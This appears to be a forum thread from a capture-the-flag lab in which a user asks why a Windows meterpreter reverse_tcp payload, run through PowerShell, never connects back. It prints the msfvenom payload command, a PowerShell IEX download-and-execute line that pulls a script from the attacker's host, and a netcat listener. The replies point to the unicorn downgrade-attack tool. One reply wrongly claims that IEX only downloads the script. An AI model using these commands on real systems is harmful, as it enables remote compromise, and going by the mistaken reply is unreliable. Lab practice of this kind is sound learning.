How to use meterpreter/reverse_tcp with PowerShell?

I’m new and having some issues using the meterpreter/reverse_tcp payload with PS.

Note: this may be kind of dumb since I already have shell access on the victim machine, but I still want to understand what I’m doing wrong.


I have shell/PS user-level access on a 64-bit Windows machine (one of the machine challenges). I want to start a meterpreter shell.

What I’m Doing

I generate a payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip_from_tun0> LPORT=9001 VERBOSE=true -f ps1 -o meterpreter.ps1

I then execute it from the remote shell (running a local webserver to host):

powershell IEX(New-Object Net.WebClient).downloadString('http://<ip_from_tun0>/meterpreter.ps1')

However, nothing happens: I just get the shell prompt back on the victim machine and no activity on my msf handler. Watching for any connections to my host with nc -lvnp 9001 also doesn’t show any connection being made.

I verified the victim can ping the host, that the content is downloaded correctly, etc. My expectation is that when the msfvenom payload is executed, it will try to connect to the handler on the given host… Is there something I’m doing wrong or am I misunderstanding how to use msfvenom?

use unicorn GitHub - trustedsec/unicorn: Unicorn is a simple tool for using a PowerShell downgrade attack and
It is specifically created for this purpose.

First you have to start a web server on your kali with <python -m SimpleHTTPServer 80> in order to be able to download it through the shell you already have.The “powershell IEX(New-Object Net.WebClient).downloadString(‘http://<ip_from_tun0>/meterpreter.ps1’)” command just downloads the file from the web server you host,it doesnt execute it.You will then have to execute the file after you download it with .Hope this helps :slight_smile: